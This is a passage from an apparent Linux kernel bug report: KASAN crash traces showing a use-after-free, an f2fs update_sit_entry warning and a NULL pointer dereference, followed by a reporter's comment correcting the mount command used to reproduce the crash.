[ 1428.847176] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.847179] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000

[ 1428.847252] Allocated by task 2683:
[ 1428.847372]  kasan_kmalloc+0xa6/0xd0
[ 1428.847380]  kmem_cache_alloc+0xc8/0x1e0
[ 1428.847385]  getname_flags+0x73/0x2b0
[ 1428.847390]  user_path_at_empty+0x1d/0x40
[ 1428.847395]  vfs_statx+0xc1/0x150
[ 1428.847401]  __do_sys_newlstat+0x7e/0xd0
[ 1428.847405]  do_syscall_64+0x73/0x160
[ 1428.847411]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1428.847466] Freed by task 2683:
[ 1428.847566]  __kasan_slab_free+0x137/0x190
[ 1428.847571]  kmem_cache_free+0x85/0x1e0
[ 1428.847575]  filename_lookup+0x191/0x280
[ 1428.847580]  vfs_statx+0xc1/0x150
[ 1428.847585]  __do_sys_newlstat+0x7e/0xd0
[ 1428.847590]  do_syscall_64+0x73/0x160
[ 1428.847596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1428.847648] The buggy address belongs to the object at ffff880194483300
                which belongs to the cache names_cache of size 4096
[ 1428.847946] The buggy address is located 576 bytes inside of
                4096-byte region [ffff880194483300, ffff880194484300)
[ 1428.848234] The buggy address belongs to the page:
[ 1428.848366] page:ffffea0006512000 count:1 mapcount:0 mapping:ffff8801f3586380 index:0x0 compound_mapcount: 0
[ 1428.848606] flags: 0x17fff8000008100(slab|head)
[ 1428.848737] raw: 017fff8000008100 dead000000000100 dead000000000200 ffff8801f3586380
[ 1428.848931] raw: 0000000000000000 0000000000070007 00000001ffffffff 0000000000000000
[ 1428.849122] page dumped because: kasan: bad access detected

[ 1428.849305] Memory state around the buggy address:
[ 1428.849436]  ffff880194483400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.849620]  ffff880194483480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.849804] >ffff880194483500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.849985]                                            ^
[ 1428.850120]  ffff880194483580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.850303]  ffff880194483600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1428.850498] ==================================================================
[ 1428.850679] Disabling lock debugging due to kernel taint
[ 1428.850762] WARNING: CPU: 0 PID: 2741 at fs/f2fs/segment.c:1829 update_sit_entry+0x733/0x7f0
[ 1428.850764] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.850845] CPU: 0 PID: 2741 Comm: a.out Tainted: G    B   W         4.17.0+ #1
[ 1428.850848] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.850855] RIP: 0010:update_sit_entry+0x733/0x7f0
[ 1428.850858] Code: 43 10 e9 15 fc ff ff 48 8d 7d 10 e8 57 ab d7 ff 48 8b 5d 10 be 04 00 00 00 48 8d 7b 48 e8 d5 ae d7 ff 8b 5b 48 e9 2e fd ff ff <0f> 0b f0 80 4d 48 04 e9 af f9 ff ff 48 8d 7d 10 e8 28 ab d7 ff 4c 
[ 1428.850923] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010286
[ 1428.850932] RAX: 0000000000000200 RBX: ffff880194483540 RCX: 0000000000000000
[ 1428.850936] RDX: ffffffffffffffff RSI: ffffffffffffffff RDI: ffff8801939e619c
[ 1428.850940] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.850943] R10: 0000000000000001 R11: ffffed003e743eba R12: 0000000000000200
[ 1428.850946] R13: 00000000ffffffff R14: ffff8801939e5de0 R15: 0000000000030000
[ 1428.850951] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.850957] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.850960] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.850965] Call Trace:
[ 1428.850975]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.850982]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.850992]  do_write_page+0xc8/0x150
[ 1428.851000]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.851007]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.851016]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.851021]  ? __mod_node_page_state+0x22/0xa0
[ 1428.851026]  ? inc_zone_page_state+0x54/0x100
[ 1428.851031]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.851042]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.851049]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.851056]  ? __get_node_page+0x335/0x6b0
[ 1428.851061]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.851072]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.851078]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.851082]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.851089]  f2fs_file_mmap+0x79/0xc0
[ 1428.851098]  mmap_region+0x58b/0x880
[ 1428.851106]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.851111]  do_mmap+0x55b/0x7a0
[ 1428.851117]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.851127]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.851134]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.851141]  ? do_sys_open+0x206/0x2a0
[ 1428.851149]  ? __fget+0xb4/0x100
[ 1428.851154]  ksys_mmap_pgoff+0x278/0x360
[ 1428.851160]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.851167]  do_syscall_64+0x73/0x160
[ 1428.851177]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.851181] RIP: 0033:0x7fb1430766ba
[ 1428.851182] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.851259] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.851264] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.851267] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.851270] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.851272] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.851275] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.851280] ---[ end trace b1cfe6aeee92e9aa ]---
[ 1428.851308] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
[ 1428.851504] PGD 80000001e9709067 P4D 80000001e9709067 PUD 1e9708067 PMD 0 
[ 1428.851685] Oops: 0000 [#1] SMP KASAN PTI
[ 1428.851801] CPU: 0 PID: 2741 Comm: a.out Tainted: G    B   W         4.17.0+ #1
[ 1428.851985] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.852219] RIP: 0010:update_sit_entry+0x558/0x7f0
[ 1428.852347] Code: f7 d1 41 c1 ec 03 83 e1 07 4c 89 e2 48 03 53 08 d3 e0 89 04 24 48 89 d7 48 89 54 24 08 e8 90 aa d7 ff 48 8b 54 24 08 8b 34 24 <0f> be 02 89 f1 f7 d1 88 4c 24 27 21 c1 85 c6 88 0a 0f 84 3b 02 00 
[ 1428.852844] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010296
[ 1428.852985] RAX: 0000000000000000 RBX: ffff880194483540 RCX: ffffffffa45ffd10
[ 1428.853166] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000000000000
[ 1428.853347] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.853527] R10: 0000000000000001 R11: ffffed003e743eba R12: 0000000000000000
[ 1428.853705] R13: 00000000ffffffff R14: ffff8801939e5de0 R15: 0000000000030000
[ 1428.858992] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.864070] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.869137] CR2: 0000000000000000 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.874143] Call Trace:
[ 1428.879196]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.884380]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.889439]  do_write_page+0xc8/0x150
[ 1428.894426]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.899415]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.904357]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.909349]  ? __mod_node_page_state+0x22/0xa0
[ 1428.914342]  ? inc_zone_page_state+0x54/0x100
[ 1428.919362]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.924423]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.929515]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.934585]  ? __get_node_page+0x335/0x6b0
[ 1428.939590]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.944587]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.949563]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.954509]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.959309]  f2fs_file_mmap+0x79/0xc0
[ 1428.963989]  mmap_region+0x58b/0x880
[ 1428.968590]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.973192]  do_mmap+0x55b/0x7a0
[ 1428.977709]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.982194]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.986714]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.991250]  ? do_sys_open+0x206/0x2a0
[ 1428.995825]  ? __fget+0xb4/0x100
[ 1429.000417]  ksys_mmap_pgoff+0x278/0x360
[ 1429.004978]  ? find_mergeable_anon_vma+0x50/0x50
[ 1429.009515]  do_syscall_64+0x73/0x160
[ 1429.014093]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1429.018665] RIP: 0033:0x7fb1430766ba
[ 1429.023134] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1429.032575] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1429.037321] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1429.042152] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1429.046761] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1429.051199] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1429.055478] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1429.059647] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1429.087581] CR2: 0000000000000000
[ 1429.092517] ---[ end trace b1cfe6aeee92e9ab ]---
[ 1429.097355] RIP: 0010:update_sit_entry+0x558/0x7f0
[ 1429.102137] Code: f7 d1 41 c1 ec 03 83 e1 07 4c 89 e2 48 03 53 08 d3 e0 89 04 24 48 89 d7 48 89 54 24 08 e8 90 aa d7 ff 48 8b 54 24 08 8b 34 24 <0f> be 02 89 f1 f7 d1 88 4c 24 27 21 c1 85 c6 88 0a 0f 84 3b 02 00 
[ 1429.112277] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010296
[ 1429.117385] RAX: 0000000000000000 RBX: ffff880194483540 RCX: ffffffffa45ffd10
[ 1429.122588] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000000000000
[ 1429.127790] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1429.133010] R10: 0000000000000001 R11: ffffed003e743eba R12: 0000000000000000
[ 1429.138374] R13: 00000000ffffffff R14: ffff8801939e5de0 R15: 0000000000030000
[ 1429.143834] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1429.149154] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1429.154467] CR2: 0000000000000000 CR3: 00000001ec9d4000 CR4: 00000000000006f0
Comment 2 Wen Xu 2018-06-29 15:46:47 UTC
(In reply to Wen Xu from comment #1)

> # mount -t f2fs final.img

Correction to the reproduction steps: the mount command above omits the mount point; it should read `mount -t f2fs final.img mnt` (loop-mounting the crafted image onto the `mnt` directory created in the first step).